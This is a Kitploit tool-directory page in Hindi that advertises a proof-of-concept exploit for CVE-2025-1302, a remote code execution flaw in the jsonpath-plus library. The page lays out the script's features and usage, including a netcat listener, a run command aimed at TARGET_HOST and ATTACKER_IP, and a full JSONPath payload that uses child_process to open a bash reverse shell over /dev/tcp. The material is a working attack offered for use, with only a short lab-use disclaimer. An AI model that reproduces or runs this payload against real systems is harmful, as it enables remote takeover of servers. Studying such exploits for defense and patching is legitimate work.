Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — jsonpath-plus में CVE-2025-1302 के लिए PoC एक्सप्लॉइट और असुरक्षित सर्वर डेमो | Kitploit
उपकरण/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

jsonpath-plus में CVE-2025-1302 के लिए PoC एक्सप्लॉइट और असुरक्षित सर्वर डेमो

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-1302 JSONPath-Plus RCE PoC

PoC स्क्रिप्ट का नाम: poc.py

CVE-2025-1302 के लिए एक proof-of-concept एक्सप्लॉइट स्क्रिप्ट, जो jsonpath-plus लाइब्रेरी में RCE भेद्यता को लक्षित करती है। जब इसे किसी संवेदनशील सेवा एंडपॉइंट के विरुद्ध चलाया जाता है, तो स्क्रिप्ट JSONPath पेलोड के माध्यम से रिमोट कोड एक्ज़ीक्यूशन ट्रिगर करने और हमलावर के पास वापस reverse shell स्थापित करने का प्रयास करती है।


विशेषताएँ

  • लचीले HTTP तरीके: --method या --no-fallback फ्लैग के माध्यम से POST, GET, या AUTO (GET फॉलबैक के साथ POST) का समर्थन करता है।
  • कस्टम पेलोड: किसी फ़ाइल से एक या अधिक JSONPath RCE पेलोड टेम्पलेट लोड करें, जिनमें {ip} और {port} टेम्प्लेटिंग होती है।
  • बिल्ट-इन डिफ़ॉल्ट पेलोड: यदि कोई पेलोड फ़ाइल प्रदान नहीं की जाती है, तो पूर्ण रूप से तैयार bash reverse shell टेम्पलेट का उपयोग करता है।
  • वर्बोज़ डिबगिंग: विफल होने पर POST और GET दोनों प्रयासों के लिए पूर्ण request/response बॉडी प्रिंट करता है।
  • प्रगति संकेतक: tqdm प्रगति बार के साथ देरी और पेलोड लूप प्रदर्शित करता है।
  • लॉगिंग: वैकल्पिक रूप से --output के साथ सभी परिणामों को JSON फ़ाइल में सहेजता है।
  • स्थापना

    1. इस रिपॉज़िटरी को क्लोन करें:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. निर्भरताएँ स्थापित करें (Python 3.6+ आवश्यक है):

      root@kitploit:~
      pip install -r requirements.txt
      

    उपयोग

    1. अपनी हमलावर मशीन पर एक लिसनर शुरू करें (आवश्यकतानुसार पोर्ट बदलें):

      root@kitploit:~
      nc -lvnp 9999
      
    2. PoC चलाएँ:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: फ़ाइल जिसमें प्रति पंक्ति एक JSONPath पेलोड हो। {ip} और {port} प्लेसहोल्डर का उपयोग करें।
    • --delay: पेलोड भेजने से पहले प्रतीक्षा करने के लिए सेकंड (काउंटडाउन दिखाता है)।
    • --method: POST, GET, या AUTO (डिफ़ॉल्ट) बलपूर्वक सेट करता है।
    • --no-fallback: किसी भी GET पुनः प्रयास को छोड़ने के लिए शॉर्टहैंड (--method POST के बराबर)।
    • --output: प्रयासों का JSON लॉग सहेजने का पथ।

    उदाहरण पेलोड फ़ाइल

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    योगदान

    1. रिपो को फोर्क करें और एक फीचर ब्रांच बनाएं।
    2. अपने बदलावों के साथ एक पुल रिक्वेस्ट सबमिट करें।

    अस्वीकरण

    इस स्क्रिप्ट का उपयोग केवल नियंत्रित प्रयोगशाला वातावरण में उन सिस्टमों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। दुरुपयोग अवैध और अनैतिक हो सकता है।

    टूल डाउनलोड करें